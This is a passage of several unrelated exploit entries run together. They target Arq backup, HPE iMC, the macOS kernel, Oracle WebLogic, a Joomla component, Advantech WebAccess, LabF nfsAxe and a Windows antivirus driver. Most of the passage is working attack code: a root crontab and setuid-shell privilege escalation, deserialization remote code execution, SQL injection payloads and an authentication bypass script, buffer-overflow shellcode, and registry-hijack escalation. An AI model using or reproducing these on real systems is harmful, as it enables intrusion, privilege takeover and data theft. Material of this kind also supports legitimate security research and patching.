f.write("* * * * * /usr/sbin/chown root:wheel #{$binary_target} &&" +
"/bin/chmod 4755 #{$binary_target}\n")
end
puts "done"
puts "wait for the next backup run to complete and then run again"
end
def stage2(target_hmac=nil)
if !target_hmac
if !File.exist? @hmac_file
raise "hmac list not found."
end
print "loading HMAC cache... "
data = File.read(@hmac_file).split("\n")
puts "done"
initial_backup_set = data.shift
if initial_backup_set == @latest_backup_set
puts "no new backup created yet"
exit 1
end
hmac = {}
data.each do |h|
hmac[h] = 1
end
hmac_targets = []
print "scanning for HMAC targets... "
scan_hmac_list.keys.each do |h|
if !hmac[h]
hmac_targets.push h
end
end
puts "done"
if hmac_targets.length == 0
puts "no HMAC targets, unable to continue."
exit 0
end
puts "found #{hmac_targets.length} HMAC targets"
hmac_targets.each do |hmac|
attempt_exploit(hmac)
end
else
attempt_exploit(target_hmac)
end
end
def build_payload(hmac)
d = "\x01\x00\x00\x00\x00\x00\x00\x00"
e = "\x00\x00\x00\x00\x03"
@overwrite_path = '/var/at/tabs/root'
plist = "
<plist version=\"1.0\">
<dict>
<key>Endpoint</key>
<string>#{@backup_endpoint}</string>
<key>BucketUUID</key>
<string>#{@bucket_uuid}</string>
<key>BucketName</key>
<string>/</string>
<key>ComputerUUID</key>
<string>#{@computer_uuid}</string>
<key>LocalPath</key>
<string>/</string>
<key>LocalMountPoint</key>
<string>/</string>
<key>StorageType</key>
<integer>1</integer>
<key>SkipDuringBackup</key>
<false></false>
<key>ExcludeItemsWithTimeMachineExcludeMetadataFlag</key>
<false></false>
</dict>
</plist>"
hex = plist.length.to_s(16).rjust(4,'0')
plist_size = (hex[0,2].to_i(16).chr + hex[2,2].to_i(16).chr)
pfl = @payload_file.length.chr
opl = @overwrite_path.length.chr
bel = @backup_endpoint.length.chr
payload = sprintf(
(
"%s\$%s%s%s%s\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00" +
"\x00\x00\x00\x00\x00\x09\x00\x00\x02\xd0\x96\x82\xef\xd8\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x08\x30" +
"\x2e\x30\x30\x30\x30\x30\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00%s%s%s\x28%s\x01\x00\x00\x00%s" +
"\x00\x00\x00%s%s%s\x00\x00\x00\x16\x00\x00\x00\x02%s\x28%s\x01\x00" +
"\x00\x00%s\x00\x00\x00%s%s%s\x00\x00\x00\x00\x00\x00\x01\xf5\x00\x00" +
"\x00\x00\x00\x00\x00\x14\x00%s%s%s\x00\x00\x00\x03%s\x0a"
).force_encoding('ASCII-8BIT'),
d, @target,
d, bel, @backup_endpoint,
plist_size, plist,
d, @latest_backup_set,
d, d, pfl, @payload_file,
d, hmac,
d, d, pfl, @payload_file,
d, opl, @overwrite_path,
e * 10
)
return payload
end
def attempt_exploit(hmac)
print "trying HMAC: #{hmac} ... "
File.open("/tmp/.arq_exp_510_payload","w") do |f|
f.write(build_payload(hmac))
end
output = shell("cat /tmp/.arq_exp_510_payload | " +
"/Applications/Arq.app/Contents/Resources/standardrestorer 2>/dev/null")
File.delete("/tmp/.arq_exp_510_payload")
if output.include?("Creating directory structure") and !output.include?("failed")
puts "SUCCESS"
print "compiling shell invoker... "
shellcode = "#include <unistd.h>\nint main()\n{ setuid(0);setgid(0);" +
"execl(\"/bin/bash\",\"bash\",\"-c\",\"rm -f #{$binary_target};rm -f " +
"/var/at/tabs/root;/bin/bash\","+ "NULL);return 0; }"
IO.popen("gcc -xc -o #{$binary_target} -", mode="r+") do |io|
io.write(shellcode)
io.close
end
puts "done"
print "waiting for root+s... "
timeout = 61
i = 0
stop = false
while i < timeout
s = File.stat($binary_target)
if s.mode == 0104755 and s.uid == 0
puts "\n"
exec($binary_target)
end
sleep 1
i += 1
if !stop
left = 60 - Time.now.strftime("%S").to_i
left == 1 && stop = true
print "#{left} "
end
end
puts "exploit failed"
exit 0
else
puts "FAIL"
end
end
end
Arq510PrivEsc.new(ARGV)
# Exploit Title: HPE iMC 7.3 Java RMI Registry Deserialization RCE Vulnerability
# Date: 01-28-2018
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.hpe.com
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=19068&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
# Version: iMC PLAT v7.3 (E0504) Standard
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-5792
# See Also: http://zerodayinitiative.com/advisories/ZDI-18-137/
# note that this PoC will launch calc.exe
$ java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.1.100 21195 CommonsBeanutils1 calc.exe
/*
The sysctls vfs.generic.conf.* are handled by sysctl_vfs_generic_conf(), which is implemented as follows:
static int
sysctl_vfs_generic_conf SYSCTL_HANDLER_ARGS
{
int *name, namelen;
struct vfstable *vfsp;
struct vfsconf vfsc;
(void)oidp;
name = arg1;
namelen = arg2;
[check for namelen==1]
mount_list_lock();
for (vfsp = vfsconf; vfsp; vfsp = vfsp->vfc_next)
if (vfsp->vfc_typenum == name[0])
break;
if (vfsp == NULL) {
mount_list_unlock();
return (ENOTSUP);
}
vfsc.vfc_reserved1 = 0;
bcopy(vfsp->vfc_name, vfsc.vfc_name, sizeof(vfsc.vfc_name));
vfsc.vfc_typenum = vfsp->vfc_typenum;
vfsc.vfc_refcount = vfsp->vfc_refcount;
vfsc.vfc_flags = vfsp->vfc_flags;
vfsc.vfc_reserved2 = 0;
vfsc.vfc_reserved3 = 0;
mount_list_unlock();
return (SYSCTL_OUT(req, &vfsc, sizeof(struct vfsconf)));
}
`struct vfsconf` is defined as follows:
struct vfsconf {
uint32_t vfc_reserved1; /* opaque
char vfc_name[MFSNAMELEN]; /* filesystem type name
int vfc_typenum; /* historic filesystem type number
int vfc_refcount; /* number mounted of this type
int vfc_flags; /* permanent flags
uint32_t vfc_reserved2; /* opaque
uint32_t vfc_reserved3; /* opaque
};
`MFSNAMELEN` is defined as follows:
#define MFSNAMELEN 15 /* length of fs type name, not inc. null
#define MFSTYPENAMELEN 16 /* length of fs type name including null
This means that one byte of uninitialized padding exists between `vfc_name` and `vfc_typenum`.
This issue was discovered using an AFL-based fuzzer, loosely based on TriforceAFL. This is the diff of two runs over the fuzzer queue with different stack poison values (0xcc and 0xdd):
--- traces_cc_/id:018803,src:012522,op:havoc,rep:2,+cov 2017-11-06 13:08:41.486752415 +0100
+++ traces_dd_/id:018803,src:012522,op:havoc,rep:2,+cov 2017-11-06 13:08:56.583413293 +0100
@@ -1,19 +1,19 @@
loaded 72 bytes fuzzdata
USER READ: addr 0xffffffffffffffff, size 8, value 0x00000600020000ca
USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000000003
USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000000004
USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000060000
USER READ: addr 0xffffffffffffffff, size 8, value 0x00ea800500000010
USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000010003
USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000000000
syscall(rax=0x600020000ca, args=[0x3, 0x4, 0x60000, 0xea800500000010, 0x10003, 0x0]); rsp=0x7ffee418eda8
USER READ: addr 0x3, size 8, value 0x0000000000000003
USER READ: addr 0xb, size 8, value 0x0000001700000002
USER WRITE: addr 0x60000, size 8, value 0x0073666800000000
USER WRITE: addr 0x60008, size 8, value 0x0000000000000000
-USER WRITE: addr 0x60010, size 8, value 0x00000017cc000000
+USER WRITE: addr 0x60010, size 8, value 0x00000017dd000000
USER WRITE: addr 0x60018, size 8, value 0x0000100000000001
USER WRITE: addr 0x60020, size 8, value 0x0000000000000000
sysret
OUT OF FUZZER INPUT DATA - REWINDING
REWIND! (trigger_exception=0x10006; cycles=7)
Verified on a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0:
$ cat sysctl_conf_test.c
*/
#include <stdlib.h>
#include <err.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/sysctl.h>
#include <sys/mount.h>
struct vfsconf_withpad {
int reserved1;
char name[15];
unsigned char pad1;
int typenum;
int refcount;
int flags;
int reserved2;
int reserved3;
};
int main(void) {
int name[] = { CTL_VFS, VFS_GENERIC, VFS_CONF, 0x17 };
static struct vfsconf_withpad conf;
size_t outlen = sizeof(conf);
if (sysctl(name, sizeof(name)/sizeof(name[0]), &conf, &outlen, NULL, 0))
err(1, "sysctl");
if (outlen != sizeof(conf))
errx(1, "outlen != sizeof(conf)");
printf("name=%.15s pad1=0x%02hhx typenum=%d refcount=%d flags=%d\n",
conf.name, conf.pad1, conf.typenum, conf.refcount, conf.flags);
}
/*
$ gcc -o sysctl_conf_test sysctl_conf_test.c -Wall
$ ./sysctl_conf_test
name=hfs pad1=0x24 typenum=23 refcount=2 flags=4096
$ ./sysctl_conf_test
name=hfs pad1=0x26 typenum=23 refcount=2 flags=4096
$ ./sysctl_conf_test
name=hfs pad1=0x24 typenum=23 refcount=2 flags=4096
$ ./sysctl_conf_test
name=hfs pad1=0x23 typenum=23 refcount=2 flags=4096
$ ./sysctl_conf_test
name=hfs pad1=0x23 typenum=23 refcount=2 flags=4096
$ ./sysctl_conf_test
name=hfs pad1=0x26 typenum=23 refcount=2 flags=4096
*/
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
# include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE',
'Description' => %q(
The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization
remote code execution vulnerability. Supported versions that are affected are
10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin
of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,
HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check
and will not be used when executing the exploit itself.
),
'License' => MSF_LICENSE,
'Author' => [
'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module
'Luffin', # Proof of Concept
'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery
],
'References' =>
[
['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin
['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept
['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit
['CVE', '2017-10271'],
['EDB', '43458']
],
'Platform' => %w{ win unix },
'Arch' => [ ARCH_CMD ],
'Targets' =>
[
[ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],
[ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
],
'DisclosureDate' => "Oct 19 2017",
# Note that this is by index, rather than name. It's generally easiest
# just to put the default at the beginning of the list and skip this
# entirely.
'DefaultTarget' => 0
)
)
register_options([
OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
OptPort.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0]),
# OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])
])
end
def cmd_base
if target['Platform'] == 'win'
return 'cmd'
else
return '/bin/sh'
end
end
def cmd_opt
if target['Platform'] == 'win'
return '/c'
else
return '-c'
end
end
#
# This generates a XML payload that will execute the desired payload on the RHOST
#
def exploit_process_builder_payload
# Generate a payload which will execute on a *nix machine using /bin/sh
xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>#{cmd_base}</string>
</void>
<void index="1">
<string>#{cmd_opt}</string>
</void>
<void index="2">
<string>#{payload.encoded.encode(xml: :text)}</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>}
end
#
# This builds a XML payload that will generate a HTTP GET request to our SRVHOST
# from the target machine.
#
def check_process_builder_payload
xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>#{get_uri.encode(xml: :text)}</string>
</void>
<void idref="url">
<void id="stream" method = "openStream" />
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>}
end
#
# In the event that a 'check' host responds, we should respond randomly so that we don't clog up
# the logs too much with a no response error or similar.
#
def on_request_uri(cli, request)
random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'
send_response(cli, random_content)
@received_request = true
end
#
# The exploit method connects to the remote service and sends a randomly generated string
# encapsulated within a SOAP XML body. This will start an HTTP server for us to receive
# the response from. This is based off of the exploit technique from
# exploits/windows/novell/netiq_pum_eval.rb
#
# This doesn't work as is because MSF cannot mix HttpServer and HttpClient
# at the time of authoring this
#
# def check
# start_service
#
# print_status('Sending the check payload...')
# res = send_request_cgi({
# 'method' => 'POST',
# 'uri' => normalize_uri(target_uri.path),
# 'data' => check_process_builder_payload,
# 'ctype' => 'text/xml;charset=UTF-8'
# }, datastore['TIMEOUT'])
#
# print_status("Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...")
#
# waited = 0
# until @received_request
# sleep 1
# waited += 1
# if waited > datastore['HTTP_DELAY']
# stop_service
# return Exploit::CheckCode::Safe
# end
# end
#
# stop_service
# return Exploit::CheckCode::Vulnerable
# end
#
# The exploit method connects to the remote service and sends the specified payload
# encapsulated within a SOAP XML body.
#
def exploit
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'data' => exploit_process_builder_payload,
'ctype' => 'text/xml;charset=UTF-8'
}, datastore['TIMEOUT'])
end
end
# # # # #
# Exploit Title: Joomla! Component CP Event Calendar 3.0.1 - SQL Injection
# Dork: N/A
# Date: 30.01.2018
# Vendor Homepage: http://www.joomlacalendars.com/
# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/cp-event-calendar/
# Version: 3.0.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6398
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_cpeventcalendar&task=load&id=[SQL]
#
# %2d%31%20%20%2f%2a%21%30%36%36%36%36%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%36%36%36%36%53%45%4c%45%43%54%2a%2f%20CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d
#
# Parameter: id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: option=com_cpeventcalendar&task=load&id=1 AND 6741=6741
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: option=com_cpeventcalendar&task=load&id=1 AND (SELECT 7531 FROM(SELECT COUNT(*),CONCAT(0x716a707671,(SELECT (ELT(7531=7531,1))),0x717a6a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
#
# Type: AND/OR time-based blind
# Title: MySQL <= 5.0.11 AND time-based blind (heavy query - comment)
# Payload: option=com_cpeventcalendar&task=load&id=1 AND 3954=BENCHMARK(5000000,MD5(0x4573626a))#
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 7 columns
# Payload: option=com_cpeventcalendar&task=load&id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a707671,0x4a61716b6d59557a4f5a496f7676584d57444e514d4d78626d42546e786d79747350424271687555,0x717a6a7a71),NULL,NULL,NULL-- cJFi
#
# # # # #
#!/usr/bin/python2.7
# Exploit Title: Advantech WebAccess BWSCADARest Login Method SQL Injection Authentication Bypass Vulnerability
# Date: 01-13-2018
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.advantech.com
# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe
# Version: Advantech WebAccess 8.0-2015.08.16
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-16716
# See Also: http://zerodayinitiative.com/advisories/ZDI-18-065/
# Notes:
#
# There are two service interfaces:
# 1) SOAP
# 2) REST
#
# This PoC targets REST
#
# The web services did not work out of the box, and a new website/app was created in IIS for testing.
# This issue was potentially due to the fact that testing was completed against a trial version.
# PoC may need slight tweaks depending on configuration of the web service.
#
# Original vulnerability was reported for more recent software version.
#
# This WebAccessAuthBypass class can be imported :-)
import sys, requests
from xml.etree import ElementTree
class WebAccessAuthBypass:
def __init__(self, ip, port):
self.ip = ip
self.port = port
self.base_url = "http://%s:%s/BWMobileService/BWScadaRest.svc/" % (ip, port)
def convert_entities(self, s):
return s.replace('>', '>').replace('<', '<') # convert html entities in response, for parsing
def get_project_list(self):
print 'Getting list of projects...'
res = requests.get(self.base_url)
projects = list()
if res.status_code != 200:
print 'Bad HTTP response...'
else:
if 'PROJECT' not in res.text:
print 'No projects listed by service.'
else:
s = self.convert_entities(res.text)
xml = ElementTree.fromstring(s)
for project_list in xml:
for project in project_list:
name = project.get('NAME')
if name is not None:
projects.append(name)
if len(projects) > 0:
print 'Found the following projects: ' + str(projects)
return projects
else:
return None
# returns a token
def login(self, project):
# SQL Injection into the user parameter
url = self.base_url + "Login/" + project + "/notadmin'%20or%20'x'%3D'x/nopass" # notadmin' or 'x'='x
res = requests.get(url)
token = None
if res.status_code != 200:
print 'Bad HTTP response...'
else:
if 'OK TOKEN' not in res.text:
print 'No token returned by service.'
else:
s = self.convert_entities(res.text)
xml = ElementTree.fromstring(s)
if len(xml) > 0:
token = xml[0].get('TOKEN')
return token
# token returned can be used for more transactions
def get_token(self):
project_list = self.get_project_list()
project = project_list[0] # might as well pick the first project
token = self.login(project_list[0])
return token
if __name__ == "__main__":
ip = 'targetip'
port = 'port#'
bypass = WebAccessAuthBypass(ip, port)
token = bypass.get_token()
if token is not None:
print 'Successfully got an authentication token: ' + token
else:
print 'Unsuccessful.'
#!/usr/bin/python
########################################################################################################
# Exploit Author: Miguel Mendez Z
# Exploit Title: LabF nfsAxe v3.7 - TFTP "Input Directory" Local Buffer Overflow
# Date: 29-01-2018
# Software: LabF nfsAxe
# Version: v3.7
# Vendor Homepage: http://www.labf.com
# Software Link: http://www.labf.com/download/nfsaxe.exe
# Tested on: Windows 7 x86
########################################################################################################
import struct
ropAlignEsp = (
"\x83\xEC\x58" #SUB ESP,58
"\x83\xEC\x58" #SUB ESP,58
"\x83\xEC\x58" #SUB ESP,58
"\x83\xEC\x58" #SUB ESP,58
"\x83\xEC\x10" #SUB ESP,10
"\xFF\xE4" #JMP ESP
)
scode = "\xB9\xEF\xEE\xEE\xEE" #MOV ECX,EEEEEEEF
scode += "\x81\xC1\x11\x11\x11\x11" #ADD ECX,11111111
scode += "\x51" #PUSH ECX
scode += "\x68\x31\x30\x73\x21" #PUSH 31307321
scode += "\x68\x73\x31\x6b\x72" #PUSH 73316b72
scode += "\x68\x5f\x62\x79\x5f" #PUSH 5f62795f
scode += "\x68\x70\x77\x6e\x64" #PUSH 70776e64
scode += "\x68\x42\x30\x66\x5f" #PUSH 4230665f
scode += "\x8B\xD4" #MOV EDX,ESP
scode += "\x48" #DEC EAX
scode += "\x50" #PUSH EAX
scode += "\x52" #PUSH EDX
scode += "\x52" #PUSH EDX
scode += "\x50" #PUSH EAX
scode += "\xBA\x11\xEA\x1A\x76" #MOV EDX,USER32.MessageBoxA() (Change)
scode += "\xFF\xD2" #CALL EDX
#--------------
scode += "\x33\xD2" #XOR EDX,EDX
scode += "\xB9\xEF\xEE\xEE\xEE" #MOV ECX,EEEEEEEF
scode += "\x81\xC1\x11\x11\x11\x11" #ADD ECX,11111111
scode += "\x51" #PUSH ECX
scode += "\x68\x63\x61\x6c\x63" #PUSH 0x63616c63
scode += "\x8B\xD4" #MOV EDX,ESP
scode += "\x52" #PUSH EDX
scode += "\x33\xD2" #XOR EDX,EDX
scode += "\xBA\x6F\xB1\x0F\x76" #MOV EDX,msvcrt.system - 0x760fb16f (Change)
scode += "\xFF\xD2" #CALL EDX
#--------------
scode += "\x50" #PUSH EAX
scode += "\xB8\xE2\xBB\xB5\x75" #MOV EAX,kernel32.ExitProcess() (Change)
scode += "\xFF\xD0" #CALL EAX
offset = "Host: "+scode+"A"*(1000-len(scode))+"\n"
offset += "File(s): "+"B"*33
offset += struct.pack("<L",0x75A6923D) #CALL ESP ADVAPI32.DLL
offset += "B"*5
offset += ropAlignEsp
offset += "B"*(1037-37+(len(ropAlignEsp)-5))+"\n"
offset += "Remote Dir y Local Dir: "+"C"*1000
payload = offset
print "Payload len: "+str(len(payload))
print "Shellcode len: "+str(len(scode))
file=open('tftpPoc.txt','w')
file.write(payload)
file.close()
/*
Exploit Title - System Shield AntiVirus & AntiSpyware Arbitrary Write Privilege Escalation
Date - 29th January 2018
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - http://www.iolo.com/
Tested Version - 5.0.0.136
Driver Version - 5.4.11.1 - amp.sys
Tested on OS - 64bit Windows 7 and Windows 10 (1709)
CVE ID - CVE-2018-5701
Vendor fix url -
Fixed Version - 0day
Fixed driver ver - 0day
Check blogpost for details:
https://www.greyhathacker.net/?p=1006
*/
#include <stdio.h>
#include <windows.h>
#include <aclapi.h>
#pragma comment(lib,"advapi32.lib")
#define MSIEXECKEY "MACHINE\\SYSTEM\\CurrentControlSet\\services\\msiserver"
#define SystemHandleInformation 16
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
typedef unsigned __int64 QWORD;
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags;
USHORT Handle;
QWORD Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG NumberOfHandles;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
QWORD TokenAddressCurrentProcess(HANDLE hProcess, DWORD MyProcessID)
{
_NtQuerySystemInformation NtQuerySystemInformation;
PSYSTEM_HANDLE_INFORMATION pSysHandleInfo;
ULONG i;
PSYSTEM_HANDLE pHandle;
QWORD TokenAddress = 0;
DWORD nSize = 4096;
DWORD nReturn;
BOOL tProcess;
HANDLE hToken;
if ((tProcess = OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) == FALSE)
{
printf("\n[-] OpenProcessToken() failed (%d)\n", GetLastError());
return -1;
}
NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
{
printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
return -1;
}
do
{
nSize += 4096;
pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION) HeapAlloc(GetProcessHeap(), 0, nSize);
} while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH);
printf("\n[i] Current process id %d and token handle value %u", MyProcessID, hToken);
for (i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
{
if (pSysHandleInfo->Handles[i].ProcessId == MyProcessID && pSysHandleInfo->Handles[i].Handle == hToken)
{
TokenAddress = pSysHandleInfo->Handles[i].Object;
}
}
HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
return TokenAddress;
}
int TakeOwnership()
{
HANDLE token;
PTOKEN_USER user = NULL;
PACL pACL = NULL;
EXPLICIT_ACCESS ea;
DWORD dwLengthNeeded;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token))
{
printf("\n[-] OpenProcessToken failed %d\n\n", GetLastError());
ExitProcess(1);
}
printf("\n[+] OpenProcessToken successful");
if (!GetTokenInformation(token, TokenUser, NULL, 0, &dwLengthNeeded) && GetLastError() != ERROR_INSUFFICIENT_BUFFER)
{
printf("\n[-] Failed to initialize GetTokenInformation %d\n\n", GetLastError());
ExitProcess(1);
}
user = (PTOKEN_USER)LocalAlloc(0, dwLengthNeeded);
if (!GetTokenInformation(token, TokenUser, user, dwLengthNeeded, &dwLengthNeeded))
{
printf("\n[-] GetTokenInformation failed %d\n\n", GetLastError());
ExitProcess(1);
}
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
// build DACL
ea.grfAccessPermissions = KEY_ALL_ACCESS;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance = SUB_CONTAINERS_AND_OBJECTS_INHERIT;
ea.Trustee.TrusteeForm = TRUSTEE_IS_SID;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = (LPTSTR)user->User.Sid;
if (SetEntriesInAcl(1, &ea, NULL, &pACL) != ERROR_SUCCESS)
{
printf("\n[-] SetEntriesInAcl failure\n\n");
ExitProcess(1);
}
printf("\n[+] SetEntriesInAcl successful");
// Take ownership
if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, OWNER_SECURITY_INFORMATION, user->User.Sid, NULL, NULL, NULL) != ERROR_SUCCESS)
{
printf("\n[-] Failed to obtain the object's ownership %d\n\n", GetLastError());
ExitProcess(1);
}
printf("\n[+] Ownership '%s' successful", MSIEXECKEY);
// Modify DACL
if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, pACL, NULL) != ERROR_SUCCESS)
{
printf("\n[-] Failed to modify the object's DACL %d\n\n", GetLastError());
ExitProcess(1);
}
printf("\n[+] Object's DACL successfully modified");
LocalFree(pACL);
CloseHandle(token);
return 0;
}
int RestorePermissions()
{
PACL pOldDACL = NULL;
PSID pSIDAdmin = NULL;
SID_IDENTIFIER_AUTHORITY SIDAuthNT = SECURITY_NT_AUTHORITY;
printf("\n[*] Restoring all permissions and value");
// Restore registry value
WriteToRegistry("%systemroot%\\system32\\msiexec.exe /V");
// Sid for the BUILTIN\Administrators group
if (!AllocateAndInitializeSid(&SIDAuthNT, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &pSIDAdmin))
{
printf("\nAllocateAndInitializeSid failed %d\n\n", GetLastError());
ExitProcess(1);
}
// Restore key ownership
if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, OWNER_SECURITY_INFORMATION, pSIDAdmin, NULL, NULL, NULL) != ERROR_SUCCESS)
{
printf("\n[-] Failed to restore the object's ownership %d\n\n", GetLastError());
ExitProcess(1);
}
printf("\n[+] Object's ownership successfully restored");
// Take copy of parent key
if (GetNamedSecurityInfo("MACHINE\\SYSTEM\\CurrentControlSet\\Services", SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS)
{
printf("\n[-] Failed to copy parent key object's DACL %d\n\n", GetLastError());
ExitProcess(1);
}
printf("\n[+] Parent key object's DACL successfully saved");
// Restore key permissions
if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION | UNPROTECTED_DACL_SECURITY_INFORMATION, NULL, NULL, pOldDACL, NULL) != ERROR_SUCCESS)
{
printf("\n[-] Failed to restore the object's DACL %d\n\n", GetLastError());
ExitProcess(1);
}
printf("\n[+] Object's DACL successfully restored");
FreeSid(pSIDAdmin);
return 0;
}
int WriteToRegistry(char command[])
{
HKEY hkeyhandle;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\services\\msiserver", 0, KEY_WRITE, &hkeyhandle) != ERROR_SUCCESS)
{
printf("\n[-] Registry key failed to open %d\n\n", GetLastError());
ExitProcess(1);
}
if (RegSetValueEx(hkeyhandle, "ImagePath", 0, REG_EXPAND_SZ, (LPBYTE) command, strlen(command)) != ERROR_SUCCESS)
{
printf("\n[-] Registry value failed to write %d\n\n", GetLastError());
ExitProcess(1);
}
printf("\n[+] Registry key opened and value modified");
RegCloseKey(hkeyhandle);
return 0;
}
int TriggerCommand()
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
ZeroMemory(&pi, sizeof(pi));
si.cb = sizeof(si);
